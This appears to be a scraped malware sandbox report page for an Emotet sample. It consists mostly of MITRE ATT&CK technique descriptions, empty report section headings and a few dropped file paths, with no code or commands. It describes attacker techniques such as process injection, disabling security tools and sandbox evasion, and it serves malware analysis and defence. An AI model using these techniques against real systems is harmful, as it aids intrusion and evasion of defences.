Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FC6cLk6kKz

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
FC6cLk6kKz

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre